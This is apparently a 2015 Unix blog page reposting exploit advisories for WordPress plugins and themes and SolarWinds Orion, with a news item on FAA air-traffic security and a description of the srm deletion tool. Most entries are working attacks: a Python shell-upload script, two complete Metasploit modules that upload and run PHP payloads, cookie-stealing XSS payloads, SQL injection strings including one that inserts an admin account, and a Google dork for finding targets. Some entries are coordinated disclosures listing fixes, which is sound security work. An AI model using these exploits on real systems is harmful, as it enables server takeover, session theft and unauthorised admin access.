MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

5Mar/150

WordPress WP All 3.2.3 Shell Upload

------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-] Proof of Concept:
 
#needs to run: php - python with requests lib installed
https://pypi.python.org/pypi/requests
import requests,os
site="localhost/x/wordpress"
file_to_upload = 'evex.php'
up_req = requests.post('http://
'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read(),timeout=20)
up_dir = os.popen('php -r "print
md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print "http://
"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/evil.php"

(9)

5Mar/150

WordPress Photocrati Theme 4.x.x SQL Injection

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
 
 
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
 
attacker can do a remote injection in site URL to get some sensitive information .
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
 
greetz to all muslims
:) from morocco

(6)

5Mar/150

WordPress Media Cleaner 2.2.6 Cross Site Scripting

# Exploit Title: Wordpress Media Cleaner - XSS
# Author: İsmail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6
 
 
# Vulnerable File(s):
                [+] wp-media-cleaner.php
 
# Vulnerable Code(s):
        [+] 647. Line
          $view = $_GET['view'] : "issues"; 
        [+] 648. Line  
          $paged = $_GET['paged'] : 1;
        [+] 653. Line
          $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;
 
# Request Method(s):
                [+] GET
 
# Vulnerable Parameter(s):
                [+] view, paged, s
 
 
 
# Proof of Concept
 
--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}
 
--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>

(6)

5Mar/150

WordPress Holding Pattern Theme Arbitrary File Upload

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'socket'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
          This module exploits a file upload vulnerability in all versions of the
          Holding Pattern theme found in the upload_file.php script which contains
          no session or file validation. It allows unauthenticated users to upload
          files of any type and subsequently execute PHP scripts in the context of
          the web server.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Alexander Borg',                 # Vulnerability disclosure
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2015-1172'],
          ['WPVDB', '7784'],
          ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
        ],
      'DisclosureDate'  => 'Feb 11 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['holding_pattern', {}]],
      'DefaultTarget'   => 0
    ))
  end
 
  def rhost
    datastore['RHOST']
  end
 
  def holding_pattern_uploads_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
  end
 
  def holding_pattern_uploader_url
    normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
  end
 
  def generate_mime_message(payload, payload_name)
    data = Rex::MIME::Message.new
    target_ip = IPSocket.getaddress(rhost)
    field_name = Rex::Text.md5(target_ip)
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
    data
  end
 
  def exploit
    print_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    data = generate_mime_message(payload, payload_name)
 
    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => holding_pattern_uploader_url,
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => data.to_s
    )
    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
    payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
 
    print_status("#{peer} - Executing the payload at #{payload_url}")
    register_files_for_cleanup(payload_name)
    send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
  end
end

(5)

5Mar/150

WordPress Admin Shell Upload

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'DisclosureDate'  => 'Feb 21 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['WordPress', {}]],
      'DefaultTarget'   => 0
    ))
 
    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
      ], self.class)
  end
 
  def username
    datastore['USERNAME']
  end
 
  def password
    datastore['PASSWORD']
  end
 
  def generate_plugin(plugin_name, payload_name)
    plugin_script = %Q{<?php
/**
 * Plugin Name: #{plugin_name}
 * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
 * Author: #{Rex::Text.rand_text_alpha(10)}
 * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
 * License: GPL2
 */
?>}
 
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
    zip
  end
 
  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
 
    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
    print_good("#{peer} - Authenticated with WordPress")
 
    print_status("#{peer} - Preparing payload...")
    plugin_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
    zip = generate_plugin(plugin_name, payload_name)
 
    print_status("#{peer} - Uploading payload...")
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
    print_status("#{peer} - Executing the payload at #{payload_uri}...")
    register_files_for_cleanup("#{payload_name}.php")
    register_files_for_cleanup("#{plugin_name}.php")
    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
  end
end

(6)

5Mar/150

Cross Site Tracer Script

#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#
 
import socket
import time
import sys, getopt
 
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
 
def main(argv):
  argc = len(argv)
 
  if argc <= 2:
    print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC
    print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC
          print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC
          sys.exit(0)
 
  target = argv[1] # SET TARGET
  port = argv[2] # SET PORT
 
  buffer1 = "TRACE / HTTP/1.1"
  buffer2 = "Test: <script>alert(1);</script>"
  buffer3 = "Host: " + target
 
  print ""
  print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "
  print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"
  print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port 
 
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  result=s.connect_ex((target,int(port)))
  s.settimeout(1.0)
 
  if result == 0:
    s.send(buffer1 + "\n")
    s.send(buffer2 + "\n")
    s.send(buffer3 + "\n\n")
    data = s.recv(1024)
    script = "alert"
    if script.lower() in data.lower():
      print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC
      print ""
      print bcolors.WARNING + data + bcolors.ENDC
    else:
      print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"
      print ""
      print ""
 
  else:
    print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC
 
  s.close()
 
main(sys.argv)

(11)

5Mar/150

US air traffic control computer system vulnerable to terrorist hackers

US air traffic control computer system vulnerable to terrorist hackers

The US system for guiding airplanes is open to vulnerabilities from outside hackers, the Government Accountability Office said Monday. The weaknesses that threaten the Federal Aviation Administration's ability to ensure the safety of flights include the failure to patch known three-year-old security holes, the transmission and storage of unencrypted passwords, and the continued use of "end-of-life" key servers.

The GAO said that deficiencies in the system that monitors some 2,850 flights at a time has positioned the air traffic system into an "increased and unnecessary risk of unauthorized access, use or modification that could disrupt air traffic control operations." What's more, the report said the FAA "did not always ensure that sensitive data were encrypted when transmitted or stored." That information included stored passwords and "authentication data."

Among the findings:

While the Federal Aviation Administration (FAA) has taken steps to protect its air traffic control systems from cyber-based and other threats, significant security control weaknesses remain, threatening the agency's ability to ensure the safe and uninterrupted operation of the national airspace system (NAS). These include weaknesses in controls intended to prevent, limit, and detect unauthorized access to computer resources, such as controls for protecting system boundaries, identifying and authenticating users, authorizing users to access systems, encrypting sensitive data, and auditing and monitoring activity on FAA's systems. Additionally, shortcomings in boundary protection controls between less-secure systems and the operational NAS environment increase the risk from these weaknesses.

The flying public's safety is in jeopardy until there's a fix to the system used at some 500 airport control towers, the GAO said. (PDF)

"Until FAA effectively implements security controls, establishes stronger agency-wide information security risk management processes ... the weaknesses GAO identified are likely to continue, placing the safe and uninterrupted operation of the nation's air traffic control system at increased and unnecessary risk."

The report chided the agency for failing to perform basic functions:

Additionally, the agency did not always ensure that security patches were applied in a timely manner to servers and network devices supporting air traffic control systems, or that servers were using software that was up-to-date. For example, certain systems were missing patches dating back more than 3 years. Additionally, certain key servers had reached end-of-life and were no longer supported by the vendor. As a result, FAA is at an increased risk that unpatched vulnerabilities could allow its information and information systems to be compromised.

Senators immediately demanded an explanation from the Transportation Department, which oversees the FAA.

"These vulnerabilities have the potential to compromise the safety and efficiency of the national airspace system, which the traveling public relies on each and every day," said John Thune (R-S.D.) and Bill Nelson (D-Fla.).

The transportation agency said it was working to correct the problems and has achieved "major milestones" toward that goal.

Fonte: http://arstechnica.com/tech-policy/2015/03/us-air-traffic-control-computer-system-vulnerable-to-terrorist-hackers/
(19)

4Mar/150

Solarwinds Orion Service SQL Injection

I found a couple SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This service provides a consistent configuration and authentication layer across the products.
 
To be exact, the vulnerable applications and versions are:
 
Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2
 
At first glance, the injections are only available to admins, as the requests used are on the Manage Accounts page. However, it seems there is no real ACL check on the GetAccounts and  etAccountGroups endpoints of the AccountManagement.asmx service, which means that even authenticating as Guest allows for exploitation. By default, the Guest account has no password and is enabled.
 
On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and 'dir' parameters are susceptible to boolean-/time-based, and stacked injections. By capturing the AJAX requests made by an admin user to these endpoints, authenticating as Guest and replacing the admin cookie with the Guest cookie, you can still make a successful request, and thus a successful exploitation vector for any authenticated user.
 
Being a stacked injection, this becomes a privilege escalation at the very least, as an attacker is able to insert their own admin user. A pull request for a Metasploit module which should achieve this on any product using the Orion service as the core authentication management system, using the GetAccounts endpoint, has been made (https://github.com/rapid7/metasploit-framework/pull/4836). By default, the module attempts to authenticate as the Guest user with a blank password, then exploit the SQL injection to insert a new admin with a blank password.
 
I am not sure if the non-trial versions allow you to specify your own SQL server, but the trials install a SQL Server Express instance. The SQL user that the application uses is not an administrator, and the xp_cmd_shell stored procedure is unavailable.
 
Within the GetAccounts endpoint:
 
Parameter: dir (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
 
 
Parameter: sort (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC
 
 
 
Within the GetAccountGroups endpoint, very similar injection techniques are
available:
 
Parameter: dir (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
 
 
Parameter: sort (GET)
 
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC
 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC
 
 
An example injection to insert an admin user named notadmin with a blank password using the 'dir' parameter would be:
 
ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');
 
This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock, Group Product Manager – Network Management at Solarwinds for the easy coordination (you should still have a bug bounty though!).
 
i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?
 
i dub thee Molarfriends vulnerability. wheres my markketing tem...
 
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

(21)

27Feb/150

srm – secure file deletion for posix systems

srm is a secure replacement for rm(1). Unlike the standard rm, it overwrites the data in the target files before unlinking them.
This prevents command-line recovery of the data by examining the raw block device.
It may also help frustrate physical examination of the disk, although it's unlikely that it can completely prevent that type of recovery.
It is, essentially, a paper shredder for sensitive files.

srm is ideal for personal computers or workstations with Internet connections.
It can help prevent malicious users from breaking in and undeleting personal files, such as old emails.
Because it uses the exact same options as rm(1), srm is simple to use.
Just subsitute it for rm whenever you want to destroy files, rather than just unlinking them.
For more information on using srm, read the manual page srm(1).
Download

The latest version of srm can always be found on the SourceForge project page which has the source code and binaries for Windows.
In addition to the files on SourceForge, other people have added prepackaged versions to the FreeBSD ports collection and Debian.

New releases can be tracked via the SourceForge account.
They're also announced on free(code) whenever a new stable version is released.

Fonte: http://srm.sourceforge.net/
(55)

26Feb/150

WordPress ADPlugg 1.1.33 Cross Site Scripting

=====================================================
Stored XSS Vulnerability in ADPlugg  Wordpress Plugin 
=====================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in ADPlugg Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and mostly prior to it
* Version Tested : 1.1.33
* version patched: 1.1.34
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Access Code
 
About Vulnerability
-------------------
This plugin is vulnerable to a Stored cross site scripting vulnerability,This issue was exploited when administrator users with access to AdPlugg Setting in wordpress Access code parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer.
 
Vulnerability Class
===================     
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) 
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
* Goto settings --> AdPlugg
* Put This payload in Access Code "><script>alert(document.cookie)</script>
* Click on the Save Changes you will see XSS in action 
* Reload the page or re navigate to page to make sure its stored ;)
 
Mitigation 
==========
Update to Version 1.1.34 
 
Change Log
==========
https://wordpress.org/plugins/adplugg/changelog/
 
Disclosure 
==========
18-February-2015 reported to developer
19-February-2015 Developer acknodlage the Bug
19-February-2015 Developer Patched the Bug and Push update
21-February-2015 Public Discloser
 
credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

(57)